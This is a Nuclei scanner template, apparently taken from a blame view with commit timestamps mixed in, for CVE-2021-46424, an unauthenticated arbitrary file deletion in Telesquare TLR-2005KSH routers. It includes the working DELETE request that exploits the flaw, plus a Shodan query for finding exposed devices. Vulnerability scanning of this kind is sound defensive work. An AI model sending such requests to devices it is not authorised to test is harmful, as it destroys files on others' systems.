2022-05-17 05:35:45 +00:00
id : CVE-2021-46424
info :
2022-05-18 20:58:07 +00:00
name : Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete
2022-05-17 05:35:45 +00:00
author : gy741
severity : critical
description : Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.
reference :
- https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt
2022-05-17 20:46:49 +00:00
- https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing
- http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.html
2022-05-18 20:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-46424
2022-05-17 05:35:45 +00:00
classification :
2022-05-17 20:46:49 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
2022-05-17 05:35:45 +00:00
cvss-score : 9.1
cve-id : CVE-2021-46424
cwe-id : CWE-306
2022-05-17 06:17:22 +00:00
metadata :
shodan-query : http.html:"TLR-2005KSH"
2022-05-17 20:46:49 +00:00
verified : "true"
2022-05-17 06:17:22 +00:00
tags : cve,cve2021,telesquare,intrusive
2022-05-17 05:35:45 +00:00
requests :
- raw :
- |
2022-05-17 06:17:22 +00:00
GET /images/icons_title.gif HTTP/1.1
2022-05-17 05:35:45 +00:00
Host : {{Hostname}}
- |
2022-05-17 06:17:22 +00:00
DELETE /images/icons_title.gif HTTP/1.1
2022-05-17 05:35:45 +00:00
Host : {{Hostname}}
2022-05-17 06:17:22 +00:00
- |
GET /images/icons_title.gif HTTP/1.1
Host : {{Hostname}}
req-condition : true
2022-05-17 05:35:45 +00:00
matchers-condition : and
matchers :
2022-05-17 06:17:22 +00:00
- type : dsl
dsl :
- "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"
2022-05-18 20:58:07 +00:00
# Enhanced by mp on 2022/05/18